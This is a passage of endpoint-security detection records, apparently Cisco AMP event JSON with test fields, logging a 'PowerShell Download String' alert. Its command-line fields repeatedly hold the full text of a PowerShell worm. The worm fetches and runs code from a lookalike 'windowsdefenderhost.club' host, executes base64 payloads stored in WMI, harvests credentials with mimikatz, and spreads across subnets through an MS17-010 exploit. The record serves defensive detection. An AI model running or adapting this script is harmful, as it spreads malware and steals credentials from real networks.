 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download 
String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
